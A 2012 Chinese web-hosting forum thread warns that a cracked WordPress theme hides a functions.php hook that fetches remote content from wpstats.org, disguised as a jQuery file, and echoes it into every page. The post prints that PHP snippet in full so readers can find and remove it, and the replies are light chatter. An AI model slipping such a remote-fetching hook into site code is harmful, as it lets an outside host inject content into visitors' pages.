全球主机交流论坛

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码

[翻译] 警告:远程调用某URL的jquery-1.6.3.min.js暗藏**站链接

起因是这样的:网上DOWN了个WP的模板正在二次加工,结果看代码的时候突然发现有一大段用<div class="display:none">隐藏起来的代码。
查了很久,才发现是调用:http://www.wpstats.org/jquery-1.6.3.min.js 这个地址的链接导致的。
尼玛坑爹啊!! 折腾我到3点多啊!! 尼玛明早还要上班啊!!
wpstats.org这个站球各种DD CC啊!!!

PS:高度怀疑是国人自己加上去的。因为人老外原版演示是没有的。坑爹啊!

PS2:用wordpress主题特别是破解主题的,检查一下你主题下functions.php中有没有以下代码,速删~
  1. if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();        $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
复制代码
悲剧了
Kvm 发表于 2012-3-1 03:43
悲剧了

K肿。。你是刚起来 还是一样苦逼的没睡?
Mr.Ra1n 发表于 2012-3-1 03:45
K肿。。你是刚起来 还是一样苦逼的没睡?

我现在的时间轴已经完全乱了

我不知道现在是什么状态了
Kvm 发表于 2012-3-1 03:50

好吧,小心穿越。
Kvm 发表于 2012-3-1 03:50

k总威武,注意身体。
撸过!
只用官方发布的模板.